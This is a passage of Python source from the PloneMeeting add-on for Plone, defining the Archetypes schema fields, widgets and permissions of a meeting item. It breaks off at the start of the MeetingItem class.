TextField(\n name='budgetInfos',\n widget=RichWidget(\n condition=\"python: here.show_budget_infos()\",\n description=\"BudgetInfos\",\n 
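# budget fields are protected by dedicated read/write permissions (ReadBudgetInfos / WriteBudgetInfos, see below)\n            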
description_msgid=\"item_budgetinfos_descr\",\n label='Budgetinfos',\n label_msgid='PloneMeeting_label_budgetInfos',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n allowable_content_types=('text/html',),\n searchable=True,\n default_method=\"getDefaultBudgetInfo\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n read_permission=ReadBudgetInfos,\n write_permission=WriteBudgetInfos,\n ),\n StringField(\n name='proposingGroup',\n widget=SelectionWidget(\n condition=\"python: not here.attribute_is_used('proposingGroupWithGroupInCharge')\",\n format=\"select\",\n label='Proposinggroup',\n label_msgid='PloneMeeting_label_proposingGroup',\n i18n_domain='PloneMeeting',\n ),\n vocabulary_factory='Products.PloneMeeting.vocabularies.userproposinggroupsvocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n name='proposingGroupWithGroupInCharge',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('proposingGroupWithGroupInCharge')\",\n format=\"select\",\n label='Proposinggroupwithgroupincharge',\n label_msgid='PloneMeeting_label_proposingGroupWithGroupInCharge',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.userproposinggroupswithgroupsinchargevocabulary',\n enforceVocabulary=True,\n ),\n LinesField(\n name='groupsInCharge',\n widget=MultiSelectionWidget(\n condition=\"python: here.show_groups_in_charge()\",\n size=10,\n description=\"Groupsincharge\",\n description_msgid=\"item_groups_in_charge_descr\",\n format=\"checkbox\",\n label='Groupsincharge',\n label_msgid='PloneMeeting_label_groupsInCharge',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemgroupsinchargevocabulary',\n enforceVocabulary=True,\n ),\n LinesField(\n name='associatedGroups',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('associatedGroups')\",\n size=10,\n description=\"AssociatedGroupItem\",\n description_msgid=\"associated_group_item_descr\",\n format=\"checkbox\",\n label='Associatedgroups',\n label_msgid='PloneMeeting_label_associatedGroups',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemassociatedgroupsvocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n name='category',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('category')\",\n format=\"select\",\n description=\"Category\",\n description_msgid=\"item_category_descr\",\n label='Category',\n label_msgid='PloneMeeting_label_category',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listCategories',\n ),\n StringField(\n name='classifier',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('classifier')\",\n format=\"select\",\n description=\"Classifier\",\n description_msgid=\"item_classifier_descr\",\n label='Classifier',\n label_msgid='PloneMeeting_label_classifier',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listClassifiers',\n ),\n LinesField(\n name='committees',\n widget=MultiSelectionWidget(\n condition=\"python: here.show_committees()\",\n size=10,\n format=\"checkbox\",\n label='Committees',\n label_msgid='PloneMeeting_label_committees',\n i18n_domain='PloneMeeting',\n ),\n optional=False,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.item_selectable_committees_vocabulary',\n enforceVocabulary=True,\n ),\n StringField(\n 
name='listType',\n default='normal',\n widget=SelectionWidget(\n visible=True,\n condition=\"python: here.adapted().mayChangeListType()\",\n label='Listtype',\n label_msgid='PloneMeeting_label_listType',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.listtypesvocabulary'\n ),\n StringField(\n name='emergency',\n default='no_emergency',\n widget=SelectionWidget(\n condition=\"python: here.showEmergency()\",\n description=\"Emergency\",\n description_msgid=\"item_emergency_descr\",\n visible=False,\n label='Emergency',\n label_msgid='PloneMeeting_label_emergency',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listEmergencies',\n ),\n StringField(\n name='preferredMeeting',\n default=ITEM_NO_PREFERRED_MEETING_VALUE,\n widget=SelectionWidget(\n condition=\"python: not here.isDefinedInTool()\",\n description=\"PreferredMeeting\",\n description_msgid=\"preferred_meeting_descr\",\n label='Preferredmeeting',\n label_msgid='PloneMeeting_label_preferredMeeting',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary='listMeetingsAcceptingItems',\n ),\n DateTimeField(\n name='meetingDeadlineDate',\n widget=DateTimeField._properties['widget'](\n condition=\"python: here.attribute_is_used('meetingDeadlineDate') and not here.isDefinedInTool()\",\n description=\"MeetingDeadlineDate\",\n description_msgid=\"meeting_deadline_date_descr\",\n label='Meetingdeadlinedate',\n label_msgid='PloneMeeting_label_meetingDeadlineDate',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n LinesField(\n name='itemTags',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('itemTags')\",\n format=\"checkbox\",\n label='Itemtags',\n label_msgid='PloneMeeting_label_itemTags',\n i18n_domain='PloneMeeting',\n ),\n multiValued=1,\n vocabulary='listItemTags',\n searchable=True,\n enforceVocabulary=True,\n optional=True,\n ),\n StringField(\n name='itemKeywords',\n widget=StringField._properties['widget'](\n size=50,\n condition=\"python: here.attribute_is_used('itemKeywords')\",\n label='Itemkeywords',\n label_msgid='PloneMeeting_label_itemKeywords',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n searchable=True,\n ),\n LinesField(\n name='optionalAdvisers',\n widget=MultiSelectionWidget(\n description=\"OptionalAdvisersItem\",\n description_msgid=\"optional_advisers_item_descr\",\n condition='python:here.showOptionalAdvisers()',\n format=\"checkbox\",\n size=10,\n label='Optionaladvisers',\n label_msgid='PloneMeeting_label_optionalAdvisers',\n i18n_domain='PloneMeeting',\n ),\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemoptionaladvicesvocabulary',\n enforceVocabulary=True,\n ),\n TextField(\n name='motivation',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('motivation')\",\n label='Motivation',\n label_msgid='PloneMeeting_label_motivation',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decision',\n widget=RichWidget(\n label='Decision',\n label_msgid='PloneMeeting_label_decision',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n 
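# unlike most rich text fields of this schema, 'decision' is required (optional=False below)\n        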
default_output_type=\"text/x-html-safe\",\n optional=False,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decisionSuite',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('decisionSuite')\",\n label='DecisionSuite',\n label_msgid='PloneMeeting_label_decisionSuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='decisionEnd',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('decisionEnd')\",\n label='DecisionEnd',\n label_msgid='PloneMeeting_label_decisionEnd',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='votesResult',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('votesResult')\",\n label='VotesResult',\n label_msgid='PloneMeeting_label_votesResult',\n description=\"VotesResult\",\n description_msgid=\"votes_result_descr\",\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n # we use WriteMarginalNotes so MeetingManagers may edit votesResult\n # when item is decided but as field in not in\n # MeetingItem._bypass_meeting_closed_check_for it will not be quick editable\n # when the meeting is closed\n write_permission=WriteMarginalNotes,\n ),\n BooleanField(\n name='oralQuestion',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showOralQuestion()\",\n description=\"OralQuestion\",\n description_msgid=\"oral_question_item_descr\",\n label='Oralquestion',\n label_msgid='PloneMeeting_label_oralQuestion',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n BooleanField(\n name='toDiscuss',\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showToDiscuss()\",\n label='Todiscuss',\n label_msgid='PloneMeeting_label_toDiscuss',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n default_method=\"getDefaultToDiscuss\",\n ),\n LinesField(\n name='itemInitiator',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('itemInitiator')\",\n description=\"ItemInitiator\",\n description_msgid=\"item_initiator_descr\",\n format=\"checkbox\",\n label='Iteminitiator',\n label_msgid='PloneMeeting_label_itemInitiator',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n optional=True,\n multiValued=1,\n vocabulary='listItemInitiators',\n ),\n TextField(\n name='inAndOutMoves',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('inAndOutMoves')\",\n description=\"InAndOutMoves\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_inAndOutMoves\",\n label='Inandoutmoves',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='notes',\n allowable_content_types=('text/html',),\n 
widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('notes')\",\n description=\"Notes\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_notes\",\n label='Notes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotes')\",\n description=\"MeetingManagersNotes\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotes\",\n label='Meetingmanagersnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotesSuite',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotesSuite')\",\n description=\"MeetingManagersNotesSuite\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotesSuite\",\n label='Meetingmanagersnotessuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='meetingManagersNotesEnd',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.showMeetingManagerReservedField('meetingManagersNotesEnd')\",\n description=\"MeetingManagersNotesEnd\",\n description_msgid=\"descr_field_reserved_to_meeting_managers\",\n label_msgid=\"PloneMeeting_label_meetingManagersNotesEnd\",\n label='Meetingmanagersnotesend',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='internalNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n description=\"InternalNotes\",\n description_msgid=\"internal_notes_descr\",\n condition=\"python: here.attribute_is_used('internalNotes')\",\n label_msgid=\"PloneMeeting_label_internalNotes\",\n label='Internalnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n optional=True,\n read_permission=WriteInternalNotes,\n write_permission=WriteInternalNotes,\n ),\n TextField(\n name='marginalNotes',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n description=\"MarginalNotes\",\n description_msgid=\"marginal_notes_descr\",\n condition=\"python: here.attribute_is_used('marginalNotes')\",\n label_msgid=\"PloneMeeting_label_marginalNotes\",\n label='Marginalnotes',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteMarginalNotes,\n ),\n TextField(\n name='observations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_itemObservations\",\n condition=\"python: here.adapted().showObservations()\",\n description_msgid=\"descr_field_vieawable_by_everyone\",\n label='Observations',\n i18n_domain='PloneMeeting',\n ),\n 
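# readable through a dedicated 'Read item observations' permission but only writable by MeetingManagers\n        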
default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read item observations\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n LinesField(\n name='templateUsingGroups',\n widget=MultiSelectionWidget(\n description=\"TemplateUsingGroups\",\n description_msgid=\"template_using_groups_descr\",\n condition=\"python: here.isDefinedInTool(item_type='itemtemplate')\",\n format=\"checkbox\",\n label='Templateusinggroups',\n label_msgid='PloneMeeting_label_templateUsingGroups',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='collective.contact.plonegroup.browser.settings.'\n 'SortedSelectedOrganizationsElephantVocabulary',\n ),\n StringField(\n name='meetingTransitionInsertingMe',\n widget=SelectionWidget(\n condition=\"python: here.isDefinedInTool(item_type='recurring')\",\n description=\"MeetingTransitionInsertingMe\",\n description_msgid=\"meeting_transition_inserting_me_descr\",\n label='Meetingtransitioninsertingme',\n label_msgid='PloneMeeting_label_meetingTransitionInsertingMe',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n vocabulary='listMeetingTransitions',\n ),\n TextField(\n name='itemAssembly',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssembly')\",\n description=\"ItemAssembly\",\n description_msgid=\"item_assembly_descr\",\n label_method=\"getLabelItemAssembly\",\n label='Itemassembly',\n label_msgid='PloneMeeting_label_itemAssembly',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyExcused',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyExcused')\",\n description=\"ItemAssemblyExcused\",\n description_msgid=\"item_assembly_excused_descr\",\n label='Itemassemblyexcused',\n label_msgid='PloneMeeting_label_itemAssemblyExcused',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyAbsents',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyAbsents')\",\n description=\"ItemAssemblyAbsents\",\n description_msgid=\"item_assembly_absents_descr\",\n label='Itemassemblyabsents',\n label_msgid='PloneMeeting_label_itemAssemblyAbsents',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemAssemblyGuests',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemAssemblyGuests')\",\n description=\"ItemAssemblyGuests\",\n description_msgid=\"item_assembly_guests_descr\",\n label='Itemassemblyguests',\n label_msgid='PloneMeeting_label_itemAssemblyGuests',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n TextField(\n name='itemSignatures',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.is_assembly_field_used('itemSignatures')\",\n description=\"ItemSignatures\",\n 
description_msgid=\"item_signatures_descr\",\n label='Itemsignatures',\n label_msgid='PloneMeeting_label_itemSignatures',\n i18n_domain='PloneMeeting',\n visible=False,\n ),\n default_output_type='text/plain',\n default_content_type='text/plain',\n ),\n LinesField(\n name='copyGroups',\n widget=MultiSelectionWidget(\n size=10,\n condition=\"python: here.attribute_is_used('copyGroups')\",\n description=\"CopyGroupsItems\",\n description_msgid=\"copy_groups_item_descr\",\n format=\"checkbox\",\n label='Copygroups',\n label_msgid='PloneMeeting_label_copyGroups',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.itemcopygroupsvocabulary',\n ),\n StringField(\n name='pollType',\n widget=SelectionWidget(\n condition=\"python: (here.attribute_is_used('pollType') or \"\n \"here.isVotesEnabled()) and here.adapted().mayChangePollType()\",\n label='Polltype',\n label_msgid='PloneMeeting_label_pollType',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n default_method=\"getDefaultPollType\",\n enforceVocabulary=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.polltypesvocabulary'\n ),\n TextField(\n name='pollTypeObservations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_pollTypeObservations\",\n condition=\"python: here.attribute_is_used('pollTypeObservations')\",\n description_msgid=\"descr_field_vieawable_by_everyone\",\n label='Polltypeobservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n TextField(\n name='committeeObservations',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('committeeObservations')\",\n description_msgid=\"descr_field_editable_by_committee_editors\",\n label='Committeeobservations',\n label_msgid='PloneMeeting_label_committeeObservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteCommitteeFields,\n ),\n TextField(\n name='committeeTranscript',\n allowable_content_types=('text/html',),\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('committeeTranscript')\",\n description_msgid=\"descr_field_vieawable_by_committee_editors\",\n label='Committeetranscript',\n label_msgid='PloneMeeting_label_committeeTranscript',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n default_output_type=\"text/x-html-safe\",\n searchable=True,\n optional=True,\n write_permission=WriteCommitteeFields,\n ),\n TextField(\n name='votesObservations',\n widget=RichWidget(\n label_msgid=\"PloneMeeting_label_votesObservations\",\n condition=\"python: here.adapted().show_votesObservations()\",\n description_msgid=\"field_vieawable_by_everyone_once_item_decided_descr\",\n label='Votesobservations',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n ),\n ReferenceField(\n name='manuallyLinkedItems',\n referencesSortable=True,\n default=[],\n widget=ReferenceBrowserWidget(\n description=\"ManuallyLinkedItems\",\n 
description_msgid=\"manually_linked_items_descr\",\n condition=\"python: here.attribute_is_used('manuallyLinkedItems') and \"\n \"not here.isDefinedInTool()\",\n allow_search=True,\n allow_browse=False,\n base_query=\"manuallyLinkedItemsBaseQuery\",\n show_results_without_query=False,\n allow_sorting=False,\n label='Manuallylinkeditems',\n label_msgid='PloneMeeting_label_manuallyLinkedItems',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n multiValued=True,\n relationship=\"ManuallyLinkedItem\",\n ),\n LinesField(\n name='otherMeetingConfigsClonableTo',\n widget=MultiSelectionWidget(\n condition=\"here/showClonableToOtherMCs\",\n format=\"checkbox\",\n label='Othermeetingconfigsclonableto',\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableTo',\n i18n_domain='PloneMeeting',\n ),\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_vocabulary',\n ),\n LinesField(\n name='otherMeetingConfigsClonableToEmergency',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToEmergency')\",\n format=\"checkbox\",\n label=\"Othermeetingconfigsclonabletoemergency\",\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableToEmergency',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_emergency_vocabulary',\n ),\n LinesField(\n name='otherMeetingConfigsClonableToPrivacy',\n widget=MultiSelectionWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToPrivacy')\",\n format=\"checkbox\",\n label=\"Othermeetingconfigsclonabletoprivacy\",\n label_msgid='PloneMeeting_label_otherMeetingConfigsClonableToPrivacy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n enforceVocabulary=True,\n multiValued=1,\n vocabulary_factory='Products.PloneMeeting.vocabularies.other_mcs_clonable_to_privacy_vocabulary',\n ),\n StringField(\n name='otherMeetingConfigsClonableToFieldTitle',\n searchable=True,\n default='',\n widget=StringWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldTitle')\",\n label_msgid=\"PloneMeeting_label_itemTitle\",\n label='OtherMeetingConfigsClonableToFieldTitle',\n i18n_domain='PloneMeeting',\n maxlength=750,\n ),\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDescription',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDescription')\",\n label_msgid=\"PloneMeeting_label_itemDescription\",\n label='Description',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDetailedDescription',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDetailedDescription')\",\n label_msgid=\"PloneMeeting_label_detailedDescription\",\n label='Detaileddescription',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldMotivation',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldMotivation')\",\n 
label='OtherMeetingConfigsClonableToFieldMotivation',\n label_msgid='PloneMeeting_label_motivation',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecision',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecision')\",\n label='OtherMeetingConfigsClonableToFieldDecision',\n label_msgid='PloneMeeting_label_decision',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecisionSuite',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecisionSuite')\",\n label='OtherMeetingConfigsClonableToFieldDecisionSuite',\n label_msgid='PloneMeeting_label_decisionSuite',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n TextField(\n name='otherMeetingConfigsClonableToFieldDecisionEnd',\n widget=RichWidget(\n condition=\"python: here.attribute_is_used('otherMeetingConfigsClonableToFieldDecisionEnd')\",\n label='OtherMeetingConfigsClonableToFieldDecisionEnd',\n label_msgid='PloneMeeting_label_decisionEnd',\n i18n_domain='PloneMeeting',\n ),\n default_content_type=\"text/html\",\n read_permission=\"PloneMeeting: Read decision\",\n searchable=True,\n allowable_content_types=('text/html',),\n default_output_type=\"text/x-html-safe\",\n optional=True,\n write_permission=WriteDecision,\n ),\n BooleanField(\n name='isAcceptableOutOfMeeting',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showIsAcceptableOutOfMeeting()\",\n description=\"IsAcceptableOutOfMeeting\",\n description_msgid=\"is_acceptable_out_of_meeting_descr\",\n label='Isacceptableoutofmeeting',\n label_msgid='PloneMeeting_label_isAcceptableOutOfMeeting',\n i18n_domain='PloneMeeting',\n ),\n ),\n BooleanField(\n name='sendToAuthority',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.attribute_is_used('sendToAuthority')\",\n description=\"SendToAuthority\",\n description_msgid=\"send_to_authority_descr\",\n label='Sendtoauthority',\n label_msgid='PloneMeeting_label_sendToAuthority',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n StringField(\n name='privacy',\n default='public',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('privacy')\",\n label='Privacy',\n label_msgid='PloneMeeting_label_privacy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary_factory='Products.PloneMeeting.vocabularies.privaciesvocabulary'\n\n ),\n StringField(\n name='completeness',\n default='completeness_not_yet_evaluated',\n widget=SelectionWidget(\n condition=\"python: here.attribute_is_used('completeness') and \"\n \"(here.adapted().mayEvaluateCompleteness() or here.adapted().mayAskCompletenessEvalAgain())\",\n 
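# the widget stays invisible (visible=False below): completeness is\n # presumably toggled through its own view, the condition above only\n # reflects who may change it (see mayEvaluateCompleteness and\n # mayAskCompletenessEvalAgain further down)\n 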
description=\"Completeness\",\n description_msgid=\"item_completeness_descr\",\n visible=False,\n label='Completeness',\n label_msgid='PloneMeeting_label_completeness',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n vocabulary='listCompleteness',\n ),\n BooleanField(\n name='itemIsSigned',\n default=False,\n widget=BooleanField._properties['widget'](\n condition=\"python: here.showItemIsSigned()\",\n label='Itemissigned',\n label_msgid='PloneMeeting_label_itemIsSigned',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n StringField(\n name='takenOverBy',\n widget=StringField._properties['widget'](\n condition=\"python: here.attribute_is_used('takenOverBy')\",\n label='Takenoverby',\n label_msgid='PloneMeeting_label_takenOverBy',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n ),\n TextField(\n name='textCheckList',\n allowable_content_types=('text/plain',),\n widget=TextAreaWidget(\n condition=\"python: here.showMeetingManagerReservedField('textCheckList')\",\n description=\"Enter elements that are necessary for this kind of item\",\n description_msgid=\"text_check_list_descr\",\n label='TextCheckList',\n label_msgid='PloneMeeting_label_textCheckList',\n i18n_domain='PloneMeeting',\n ),\n optional=True,\n write_permission=WriteItemMeetingManagerFields,\n default_output_type=\"text/x-html-safe\",\n default_content_type=\"text/plain\",\n ),\n\n),\n)\n\nMeetingItem_schema = OrderedBaseFolderSchema.copy() + \\\n schema.copy()\n\n# Make title longer\nMeetingItem_schema['title'].widget.maxlength = '750'\n# Define a specific msgid for title\nMeetingItem_schema['title'].widget.i18n_domain = 'PloneMeeting'\nMeetingItem_schema['title'].widget.label_msgid = 'PloneMeeting_label_itemTitle'\n\n\nclass MeetingItem(OrderedBaseFolder, BrowserDefaultMixin):\n \"\"\"\n \"\"\"\n security = ClassSecurityInfo()\n implements(IMeetingItem)\n\n meta_type = 'MeetingItem'\n _at_rename_after_creation = True\n\n schema = MeetingItem_schema\n\n security.declarePublic('title_or_id')\n\n def title_or_id(self, withTypeName=True):\n '''Implemented the deprecated method 'title_or_id' because it is used by\n archetypes.referencebrowserwidget in the popup. We also override the\n view to use it in the widget in edit mode. 
